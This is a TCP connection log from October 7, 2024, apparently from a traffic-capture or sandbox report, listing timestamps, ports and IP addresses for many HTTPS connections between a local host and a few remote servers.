Oct 7, 2024 03:15:22.988034010 CEST	49726	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.988058090 CEST	443	49726	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.988084078 CEST	49726	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.988092899 CEST	443	49726	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.990755081 CEST	49732	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.990803957 CEST	443	49732	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.990870953 CEST	49732	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.991041899 CEST	49732	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.991055965 CEST	443	49732	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.999629974 CEST	443	49724	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.999699116 CEST	443	49724	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.999741077 CEST	49724	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.999886990 CEST	49724	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.999886990 CEST	49724	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.999905109 CEST	443	49724	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.999913931 CEST	443	49724	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.002578974 CEST	49733	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.002623081 CEST	443	49733	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.002672911 CEST	49733	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.002810001 CEST	49733	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.002831936 CEST	443	49733	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.522490025 CEST	443	49728	23.1.237.91	192.168.2.5
Oct 7, 2024 03:15:23.522572041 CEST	49728	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:23.593837023 CEST	443	49729	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.594377041 CEST	49729	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.594400883 CEST	443	49729	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.594847918 CEST	49729	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.594854116 CEST	443	49729	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.599246979 CEST	443	49730	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.600028038 CEST	49730	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.600028038 CEST	49730	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.600040913 CEST	443	49730	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.600059986 CEST	443	49730	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.632623911 CEST	443	49732	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.634865046 CEST	49732	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.634890079 CEST	443	49732	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.635668039 CEST	49732	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.635680914 CEST	443	49732	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.644366026 CEST	443	49733	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.645143032 CEST	49733	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.645143032 CEST	49733	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.645231962 CEST	443	49733	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.645262957 CEST	443	49733	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.667465925 CEST	443	49731	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.667896032 CEST	49731	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.667960882 CEST	443	49731	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.668303013 CEST	49731	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.668324947 CEST	443	49731	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.693912983 CEST	443	49729	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.693978071 CEST	443	49729	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.694490910 CEST	49729	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.694490910 CEST	49729	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.694547892 CEST	49729	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.694564104 CEST	443	49729	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.697238922 CEST	49735	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.697274923 CEST	443	49735	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.697407961 CEST	49735	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.697630882 CEST	49735	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.697642088 CEST	443	49735	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.697663069 CEST	443	49730	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.697813988 CEST	443	49730	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.698009968 CEST	49730	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.698009968 CEST	49730	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.698070049 CEST	49730	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.698076010 CEST	443	49730	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.700417042 CEST	49736	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.700454950 CEST	443	49736	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.701086044 CEST	49736	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.701086044 CEST	49736	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.701126099 CEST	443	49736	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.732362032 CEST	443	49732	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.732445955 CEST	443	49732	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.732712984 CEST	49732	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.732713938 CEST	49732	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.732775927 CEST	49732	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.732795954 CEST	443	49732	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.735671997 CEST	49737	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.735719919 CEST	443	49737	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.735841036 CEST	49737	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.736030102 CEST	49737	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.736043930 CEST	443	49737	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.742738962 CEST	443	49733	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.742877007 CEST	443	49733	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.743355989 CEST	49733	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.743439913 CEST	49733	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.743439913 CEST	49733	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.743478060 CEST	443	49733	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.743501902 CEST	443	49733	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.745598078 CEST	49738	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.745625019 CEST	443	49738	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.745749950 CEST	49738	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.746454954 CEST	49738	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.746467113 CEST	443	49738	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.773255110 CEST	443	49731	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.773406029 CEST	443	49731	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.773499966 CEST	49731	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.773652077 CEST	49731	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.773652077 CEST	49731	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.773674011 CEST	443	49731	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.773689032 CEST	443	49731	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.775770903 CEST	49739	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.775810003 CEST	443	49739	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:23.776236057 CEST	49739	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.776433945 CEST	49739	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:23.776451111 CEST	443	49739	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.346875906 CEST	443	49736	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.348368883 CEST	49736	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.348368883 CEST	49736	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.348391056 CEST	443	49736	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.348401070 CEST	443	49736	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.364218950 CEST	443	49735	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.365580082 CEST	49735	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.365580082 CEST	49735	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.365596056 CEST	443	49735	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.365602970 CEST	443	49735	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.381216049 CEST	443	49738	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.381937981 CEST	49738	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.381937981 CEST	49738	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.381958008 CEST	443	49738	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.381964922 CEST	443	49738	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.383343935 CEST	443	49737	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.384215117 CEST	49737	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.384224892 CEST	443	49737	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.384243011 CEST	49737	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.384248018 CEST	443	49737	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.425662994 CEST	443	49739	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.426100969 CEST	49739	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.426115990 CEST	443	49739	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.426675081 CEST	49739	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.426687002 CEST	443	49739	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.447110891 CEST	443	49736	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.447173119 CEST	443	49736	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.447360039 CEST	49736	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.447694063 CEST	49736	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.447694063 CEST	49736	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.447715998 CEST	443	49736	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.447726965 CEST	443	49736	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.450288057 CEST	49741	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.450345039 CEST	443	49741	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.450454950 CEST	49741	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.450938940 CEST	49741	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.450964928 CEST	443	49741	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.467628956 CEST	443	49735	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.467689037 CEST	443	49735	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.467928886 CEST	49735	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.467930079 CEST	49735	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.467930079 CEST	49735	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.470464945 CEST	49742	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.470510006 CEST	443	49742	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.470982075 CEST	49742	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.471199036 CEST	49742	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.471223116 CEST	443	49742	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.480215073 CEST	443	49738	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.480285883 CEST	443	49738	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.480418921 CEST	49738	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.480462074 CEST	49738	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.480473995 CEST	443	49738	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.480499983 CEST	49738	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.480505943 CEST	443	49738	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.482944012 CEST	49743	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.482985973 CEST	443	49743	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.483407021 CEST	49743	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.483407974 CEST	49743	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.483444929 CEST	443	49743	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.484026909 CEST	443	49737	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.484177113 CEST	443	49737	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.484314919 CEST	49737	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.484468937 CEST	49737	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.484468937 CEST	49737	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.484478951 CEST	443	49737	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.484486103 CEST	443	49737	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.486989975 CEST	49744	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.487081051 CEST	443	49744	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.487287045 CEST	49744	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.487287045 CEST	49744	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.487370968 CEST	443	49744	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.527343035 CEST	443	49739	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.527539015 CEST	443	49739	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.527645111 CEST	49739	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.527645111 CEST	49739	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.527703047 CEST	49739	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.527719975 CEST	443	49739	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.530039072 CEST	49746	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.530071020 CEST	443	49746	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.530530930 CEST	49746	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.530672073 CEST	49746	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.530684948 CEST	443	49746	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:24.774770975 CEST	49735	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:24.774795055 CEST	443	49735	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.112406969 CEST	443	49741	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.112854004 CEST	49741	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.112920046 CEST	443	49741	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.114727020 CEST	49741	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.114748955 CEST	443	49741	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.122503042 CEST	443	49743	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.122703075 CEST	443	49744	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.123215914 CEST	49743	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.123256922 CEST	443	49743	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.123697042 CEST	49744	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.123759031 CEST	443	49744	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.123770952 CEST	49743	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.123776913 CEST	443	49743	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.124141932 CEST	49744	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.124157906 CEST	443	49744	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.124650002 CEST	443	49742	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.124948025 CEST	49742	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.124974966 CEST	443	49742	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.125530958 CEST	49742	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.125541925 CEST	443	49742	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.172441006 CEST	443	49746	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.173227072 CEST	49746	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.173238039 CEST	443	49746	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.173486948 CEST	49746	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.173494101 CEST	443	49746	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.220076084 CEST	443	49743	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.220246077 CEST	443	49743	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.220304012 CEST	49743	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.220769882 CEST	49743	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.220788956 CEST	443	49743	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.220801115 CEST	49743	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.220807076 CEST	443	49743	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.221180916 CEST	443	49744	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.221385002 CEST	443	49744	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.221456051 CEST	49744	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.224383116 CEST	443	49742	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.224519014 CEST	443	49742	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.224591970 CEST	49742	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.224925995 CEST	49744	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.224925995 CEST	49744	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.224971056 CEST	443	49744	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.224997997 CEST	443	49744	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.228627920 CEST	49742	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.228629112 CEST	49742	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.228677034 CEST	443	49742	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.228704929 CEST	443	49742	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.240107059 CEST	49747	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.240159988 CEST	443	49747	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.240247011 CEST	49747	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.240866899 CEST	49748	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.240959883 CEST	443	49748	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.241040945 CEST	49748	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.241168976 CEST	49747	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.241197109 CEST	443	49747	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.241530895 CEST	49749	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.241595984 CEST	443	49749	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.241668940 CEST	49749	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.241748095 CEST	49748	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.241782904 CEST	443	49748	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.241817951 CEST	49749	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.241837978 CEST	443	49749	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.270250082 CEST	443	49746	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.270421982 CEST	443	49746	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.270607948 CEST	49746	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.270634890 CEST	49746	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.270634890 CEST	49746	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.270656109 CEST	443	49746	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.270663977 CEST	443	49746	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.273430109 CEST	49750	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.273488998 CEST	443	49750	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.273638964 CEST	49750	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.273823977 CEST	49750	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.273844004 CEST	443	49750	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.455482006 CEST	443	49741	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.455648899 CEST	443	49741	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.455741882 CEST	49741	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.455871105 CEST	49741	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.455923080 CEST	443	49741	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.455951929 CEST	49741	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.455967903 CEST	443	49741	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.460669041 CEST	49751	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.460731030 CEST	443	49751	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.460807085 CEST	49751	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.461189032 CEST	49751	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.461216927 CEST	443	49751	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.880506039 CEST	443	49748	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.881179094 CEST	49748	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.881225109 CEST	443	49748	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.881685972 CEST	49748	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.881695032 CEST	443	49748	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.917486906 CEST	443	49750	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.918663979 CEST	443	49747	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.918740034 CEST	49750	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.918787956 CEST	443	49750	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.919014931 CEST	49750	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.919022083 CEST	443	49750	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.919835091 CEST	49747	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.919920921 CEST	443	49747	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.920341015 CEST	49747	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.920356989 CEST	443	49747	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.953402996 CEST	443	49749	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.954006910 CEST	49749	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.954025984 CEST	443	49749	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.954603910 CEST	49749	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.954608917 CEST	443	49749	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.984975100 CEST	443	49748	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.985126972 CEST	443	49748	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.985637903 CEST	49748	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.985637903 CEST	49748	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.985892057 CEST	49748	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.985922098 CEST	443	49748	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.988616943 CEST	49752	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.988684893 CEST	443	49752	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:25.988791943 CEST	49752	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.988903999 CEST	49752	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:25.988915920 CEST	443	49752	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.016387939 CEST	443	49750	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.016479015 CEST	443	49750	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.016563892 CEST	49750	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.016762018 CEST	49750	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.016762018 CEST	49750	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.016784906 CEST	443	49750	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.016797066 CEST	443	49750	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.019488096 CEST	49753	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.019536972 CEST	443	49753	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.019619942 CEST	49753	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.020056009 CEST	49753	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.020072937 CEST	443	49753	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.022536039 CEST	443	49747	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.022675991 CEST	443	49747	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.022811890 CEST	49747	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.022811890 CEST	49747	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.022811890 CEST	49747	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.024904013 CEST	49754	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.024915934 CEST	443	49754	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.025021076 CEST	49754	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.025202990 CEST	49754	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.025221109 CEST	443	49754	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.058279991 CEST	443	49749	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.058363914 CEST	443	49749	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.058581114 CEST	49749	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.058912039 CEST	49749	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.058912039 CEST	49749	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.058933973 CEST	443	49749	13.107.246.45	192.168.2.5
